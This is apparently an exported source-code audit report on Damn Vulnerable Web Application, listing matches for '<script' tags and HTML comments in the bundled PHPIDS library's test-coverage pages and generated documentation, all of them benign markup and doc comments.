Highlighting: On | Off
Show: All | OK | Dubious | Bad

Damn Vulnerable Web Application

Source Code Audit - 2013-03-11
Prepared for Enzo's Pizza

Your browser does not support HTML 5 Local Storage. Your work will not be saved.

html

<script (22) Top | Hide

./external/phpids/0.6/tests/coverage/Caching_Factory.php.html:9 (1/22) OK | Dubious | Bad | Hide 
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_Factory.php.html:261 (2/22) OK | Dubious | Bad | Hide 
258-
259-    <br />
260-
261:    <script language="javascript">
262-      $E = YAHOO.util.Event;
263-      YAHOO.namespace("phpunit.container");
264-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Caching_File.php.html:9 (3/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_File.php.html:456 (4/22) OK | Dubious | Bad | Hide 
453-
454-    <br />
455-
456:    <script language="javascript">
457-      $E = YAHOO.util.Event;
458-      YAHOO.namespace("phpunit.container");
459-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Filter.php.html:9 (5/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Filter.php.html:486 (6/22) OK | Dubious | Bad | Hide 
483-
484-    <br />
485-
486:    <script language="javascript">
487-      $E = YAHOO.util.Event;
488-      YAHOO.namespace("phpunit.container");
489-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Caching_Session.php.html:9 (7/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_Session.php.html:380 (8/22) OK | Dubious | Bad | Hide 
377-
378-    <br />
379-
380:    <script language="javascript">
381-      $E = YAHOO.util.Event;
382-      YAHOO.namespace("phpunit.container");
383-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Converter.php.html:9 (9/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Converter.php.html:1230 (10/22) OK | Dubious | Bad | Hide 
1227-
1228-    <br />
1229-
1230:    <script language="javascript">
1231-      $E = YAHOO.util.Event;
1232-      YAHOO.namespace("phpunit.container");
1233-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Event.php.html:9 (11/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Event.php.html:557 (12/22) OK | Dubious | Bad | Hide 
554-
555-    <br />
556-
557:    <script language="javascript">
558-      $E = YAHOO.util.Event;
559-      YAHOO.namespace("phpunit.container");
560-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Caching_Interface.php.html:9 (13/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Caching_Interface.php.html:187 (14/22) OK | Dubious | Bad | Hide 
184-
185-    <br />
186-
187:    <script language="javascript">
188-      $E = YAHOO.util.Event;
189-      YAHOO.namespace("phpunit.container");
190-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Monitor.php.html:9 (15/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Monitor.php.html:1245 (16/22) OK | Dubious | Bad | Hide 
1242-
1243-    <br />
1244-
1245:    <script language="javascript">
1246-      $E = YAHOO.util.Event;
1247-      YAHOO.namespace("phpunit.container");
1248-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Init.php.html:9 (17/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Init.php.html:576 (18/22) OK | Dubious | Bad | Hide 
573-
574-    <br />
575-
576:    <script language="javascript">
577-      $E = YAHOO.util.Event;
578-      YAHOO.namespace("phpunit.container");
579-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Report.php.html:9 (19/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Report.php.html:774 (20/22) OK | Dubious | Bad | Hide 
771-
772-    <br />
773-
774:    <script language="javascript">
775-      $E = YAHOO.util.Event;
776-      YAHOO.namespace("phpunit.container");
777-      YAHOO.phpunit.container.panelsData = {
./external/phpids/0.6/tests/coverage/Filter_Storage.php.html:9 (21/22) OK | Dubious | Bad | Hide 
6-    <title>PHPIDS</title>
7-    <link rel="stylesheet" type="text/css" href="style.css">
8-    <link rel="stylesheet" type="text/css" href="container.css">
9:    <script type="text/javascript" src="yahoo-dom-event.js"></script>
10:    <script type="text/javascript" src="container-min.js"></script>
11-  </head>
12-
13-  <body class="yui-skin-sam">
./external/phpids/0.6/tests/coverage/Filter_Storage.php.html:683 (22/22) OK | Dubious | Bad | Hide 
680-
681-    <br />
682-
683:    <script language="javascript">
684-      $E = YAHOO.util.Event;
685-      YAHOO.namespace("phpunit.container");
686-      YAHOO.phpunit.container.panelsData = {

<!-- (257) Top | Hide

./external/phpids/0.6/docs/phpdocumentor/packages.html:5 (1/257) OK | Dubious | Bad | Hide 
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<link rel="stylesheet" href="media/banner.css" />
./external/phpids/0.6/docs/phpdocumentor/elementindex_PHPIDS.html:5 (2/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/classtrees_PHPIDS.html:5 (3/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
9-		</head>
10-		<body>
11-						
12:<!-- Start of Class Data -->
13-<H2>
14-	
15-</H2>
./external/phpids/0.6/docs/phpdocumentor/errors.html:5 (4/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>phpDocumentor Parser Errors and Warnings</title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/elementindex.html:5 (5/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/index.html:7 (6/257) OK | Dubious | Bad | Hide 
4-     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
5-   <html xmlns="http://www.w3.org/1999/xhtml">
6-<head>
7:	<!-- Generated by phpDocumentor on Mon, 22 Dec 2008 13:36:38 +0100  -->
8-  <title>Generated Documentation</title>
9-  <meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
10-</head>
./external/phpids/0.6/docs/phpdocumentor/li_PHPIDS.html:5 (7/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title></title>
7-			<link rel="stylesheet" href="media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:5 (8/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Caching_Database</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:28 (9/257) OK | Dubious | Bad | Hide 
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Caching_Interface.html">IDS_Caching_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">Database caching wrapper</p>
30-<p class="description"><p>This class inhabits functionality to get and set cache via a database.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:99 (10/257) OK | Dubious | Bad | Hide 
96-		</div>
97-		<div class="info-box-body">
98-			<A NAME='method_detail'></A>
99:<a name="methodgetInstance" id="getInstance"><!-- --></a>
100-<div class="evenrow">
101-	
102-	<div class="method-header">
103-		<span class="method-title">static method getInstance</span> (line <span class="line-number">129</span>)
104-	</div> 
105-	
106:	<!-- ========== Info from phpDoc block ========= -->
107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:133 (11/257) OK | Dubious | Bad | Hide 
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="oddrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">113</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
141-<p class="short-description">Constructor</p>
142-<p class="description"><p>Connects to database.</p></p>
143-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:166 (12/257) OK | Dubious | Bad | Hide 
163-		
164-			
165-	</div>
166:<a name="methodgetCache" id="getCache"><!-- --></a>
167-<div class="evenrow">
168-	
169-	<div class="method-header">
170-		<span class="method-title">getCache</span> (line <span class="line-number">181</span>)
171-	</div> 
172-	
173:	<!-- ========== Info from phpDoc block ========= -->
174-<p class="short-description">Returns the cached data</p>
175-<p class="description"><p>Note that this method returns false if either type or file cache is  not set</p></p>
176-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Database.html:199 (13/257) OK | Dubious | Bad | Hide 
196-					</dl>
197-			
198-	</div>
199:<a name="methodsetCache" id="setCache"><!-- --></a>
200-<div class="oddrow">
201-	
202-	<div class="method-header">
203-		<span class="method-title">setCache</span> (line <span class="line-number">146</span>)
204-	</div> 
205-	
206:	<!-- ========== Info from phpDoc block ========= -->
207-<p class="short-description">Writes cache data into the database</p>
208-	<ul class="tags">
209-				<li><span class="field">throws:</span> PDOException if a db error occurred</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage---Abstract.php.html:5 (14/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Abstract.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage---Abstract.php.html:22 (15/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2007 PHPIDS (http://php-ids.org)</p><p>This program is free software; you can redistribute it and/or modify  it under the terms of the GNU General Public License as published by  the Free Software Foundation; version 2 of the license.</p><p>This program is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the  GNU General Public License for more details.</p></p>
25-
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:5 (16/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Database.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:23 (17/257) OK | Dubious | Bad | Hide 
20-			|							<a href="#sec-includes">Includes</a>
21-												</div>
22-	<div class="info-box-body">	
23:		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS</p>
25-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:72 (18/257) OK | Dubious | Bad | Hide 
69-				|						<span class="disabled">Includes</span>
70-														</div>
71-		<div class="info-box-body">	
72:			<a name="_IDS/Caching/Interface_php"><!-- --></a>
73-<div class="evenrow">
74-	
75-	<div>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Caching---Database.php.html:83 (19/257) OK | Dubious | Bad | Hide 
80-		</span>
81-	</div>
82-
83:	<!-- ========== Info from phpDoc block ========= -->
84-<p class="short-description">PHPIDS</p>
85-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
86-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter.php.html:5 (20/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Filter.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter.php.html:22 (21/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:5 (22/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_File</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:28 (23/257) OK | Dubious | Bad | Hide 
25-            <ul>
26-                <li><a href="../PHPIDS/IDS_Log_Interface.html">IDS_Log_Interface</a></li>            </ul>
27-        </p>
28:        		<!-- ========== Info from phpDoc block ========= -->
29-<p class="short-description">File logging wrapper</p>
30-<p class="description"><p>The file wrapper is designed to store data into a flatfile. It implements the  singleton pattern.</p></p>
31-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:98 (24/257) OK | Dubious | Bad | Hide 
95-		</div>
96-		<div class="info-box-body">
97-			<A NAME='method_detail'></A>
98:<a name="methodgetInstance" id="getInstance"><!-- --></a>
99-<div class="evenrow">
100-	
101-	<div class="method-header">
102-		<span class="method-title">static method getInstance</span> (line <span class="line-number">110</span>)
103-	</div> 
104-	
105:	<!-- ========== Info from phpDoc block ========= -->
106-<p class="short-description">Returns an instance of this class</p>
107-<p class="description"><p>This method allows the passed argument to be either an instance of  IDS_Init or a path to a log file. Due to the singleton pattern only one  instance for each file can be initiated.</p></p>
108-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:130 (25/257) OK | Dubious | Bad | Hide 
127-			
128-	</div>
129-
130:<a name="method__construct" id="__construct"><!-- --></a>
131-<div class="oddrow">
132-	
133-	<div class="method-header">
134-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">86</span>)
135-	</div> 
136-	
137:	<!-- ========== Info from phpDoc block ========= -->
138-<p class="short-description">Constructor</p>
139-	<ul class="tags">
140-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:159 (26/257) OK | Dubious | Bad | Hide 
156-		
157-			
158-	</div>
159:<a name="methodexecute" id="execute"><!-- --></a>
160-<div class="evenrow">
161-	
162-	<div class="method-header">
163-		<span class="method-title">execute</span> (line <span class="line-number">184</span>)
164-	</div> 
165-	
166:	<!-- ========== Info from phpDoc block ========= -->
167-<p class="short-description">Stores given data into a file</p>
168-	<ul class="tags">
169-				<li><span class="field">throws:</span> Exception if the logfile isn't writeable</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_File.html:195 (27/257) OK | Dubious | Bad | Hide 
192-					</dl>
193-			
194-	</div>
195:<a name="methodprepareData" id="prepareData"><!-- --></a>
196-<div class="oddrow">
197-	
198-	<div class="method-header">
199-		<span class="method-title">prepareData</span> (line <span class="line-number">146</span>)
200-	</div> 
201-	
202:	<!-- ========== Info from phpDoc block ========= -->
203-<p class="short-description">Prepares data</p>
204-<p class="description"><p>Converts given data into a format that can be stored into a file.  You might edit this method to your requirements.</p></p>
205-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:5 (28/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Init</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:24 (29/257) OK | Dubious | Bad | Hide 
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Framework initiation</p>
26-<p class="description"><p>This class is used for the purpose to initiate the framework and inhabits  functionality to parse the needed configuration file.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:139 (30/257) OK | Dubious | Bad | Hide 
136-							
137-					</div>
138-		<div class="info-box-body">
139:			<a name="var$config" id="$config"><!-- --></A>
140-<div class="oddrow">
141-
142-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:150 (31/257) OK | Dubious | Bad | Hide 
147-		</span>
148-	</div>
149-
150:	<!-- ========== Info from phpDoc block ========= -->
151-<p class="short-description">Holds config settings</p>
152-	<ul class="tags">
153-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:176 (32/257) OK | Dubious | Bad | Hide 
173-		</div>
174-		<div class="info-box-body">
175-			<A NAME='method_detail'></A>
176:<a name="methodinit" id="init"><!-- --></a>
177-<div class="evenrow">
178-	
179-	<div class="method-header">
180-		<span class="method-title">static method init</span> (line <span class="line-number">115</span>)
181-	</div> 
182-	
183:	<!-- ========== Info from phpDoc block ========= -->
184-<p class="short-description">Returns an instance of this class. Also a PHP version check  is being performed to avoid compatibility problems with PHP &lt; 5.1.6</p>
185-	<ul class="tags">
186-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:207 (33/257) OK | Dubious | Bad | Hide 
204-			
205-	</div>
206-
207:<a name="methodgetBasePath" id="getBasePath"><!-- --></a>
208-<div class="oddrow">
209-	
210-	<div class="method-header">
211-		<span class="method-title">getBasePath</span> (line <span class="line-number">161</span>)
212-	</div> 
213-	
214:	<!-- ========== Info from phpDoc block ========= -->
215-<p class="short-description">This method checks if a base path is given and usage is set to true.</p>
216-<p class="description"><p>If all that tests succeed the base path will be returned as a string -  else null will be returned.</p></p>
217-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:233 (34/257) OK | Dubious | Bad | Hide 
230-		
231-			
232-	</div>
233:<a name="methodgetConfig" id="getConfig"><!-- --></a>
234-<div class="evenrow">
235-	
236-	<div class="method-header">
237-		<span class="method-title">getConfig</span> (line <span class="line-number">220</span>)
238-	</div> 
239-	
240:	<!-- ========== Info from phpDoc block ========= -->
241-<p class="short-description">Returns the config array</p>
242-	<ul class="tags">
243-				<li><span class="field">return:</span> the config array</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:258 (35/257) OK | Dubious | Bad | Hide 
255-		
256-			
257-	</div>
258:<a name="methodgetConfigPath" id="getConfigPath"><!-- --></a>
259-<div class="oddrow">
260-	
261-	<div class="method-header">
262-		<span class="method-title">getConfigPath</span> (line <span class="line-number">149</span>)
263-	</div> 
264-	
265:	<!-- ========== Info from phpDoc block ========= -->
266-<p class="short-description">Returns path to configuration file</p>
267-	<ul class="tags">
268-				<li><span class="field">return:</span> the config path</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:283 (36/257) OK | Dubious | Bad | Hide 
280-		
281-			
282-	</div>
283:<a name="methodsetConfig" id="setConfig"><!-- --></a>
284-<div class="evenrow">
285-	
286-	<div class="method-header">
287-		<span class="method-title">setConfig</span> (line <span class="line-number">178</span>)
288-	</div> 
289-	
290:	<!-- ========== Info from phpDoc block ========= -->
291-<p class="short-description">Merges new settings into the exsiting ones or overwrites them</p>
292-	<ul class="tags">
293-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:315 (37/257) OK | Dubious | Bad | Hide 
312-		
313-			
314-	</div>
315:<a name="methodsetConfigPath" id="setConfigPath"><!-- --></a>
316-<div class="oddrow">
317-	
318-	<div class="method-header">
319-		<span class="method-title">setConfigPath</span> (line <span class="line-number">132</span>)
320-	</div> 
321-	
322:	<!-- ========== Info from phpDoc block ========= -->
323-<p class="short-description">Sets the path to the configuration file</p>
324-	<ul class="tags">
325-				<li><span class="field">throws:</span> Exception if file not found</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:345 (38/257) OK | Dubious | Bad | Hide 
342-		
343-			
344-	</div>
345:<a name="method_mergeConfig" id="_mergeConfig"><!-- --></a>
346-<div class="evenrow">
347-	
348-	<div class="method-header">
349-		<span class="method-title">_mergeConfig</span> (line <span class="line-number">198</span>)
350-	</div> 
351-	
352:	<!-- ========== Info from phpDoc block ========= -->
353-<p class="short-description">Merge config hashes recursivly</p>
354-<p class="description"><p>The algorithm merges configuration arrays recursively. If an element is  an array in both, the values will be appended. If it is a scalar in both,  the value will be replaced.</p></p>
355-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Init.html:379 (39/257) OK | Dubious | Bad | Hide 
376-		
377-			
378-	</div>
379:<a name="method__clone" id="__clone"><!-- --></a>
380-<div class="oddrow">
381-	
382-	<div class="method-header">
383-		<span class="method-title">__clone</span> (line <span class="line-number">103</span>)
384-	</div> 
385-	
386:	<!-- ========== Info from phpDoc block ========= -->
387-<p class="short-description">Permitting to clone this object</p>
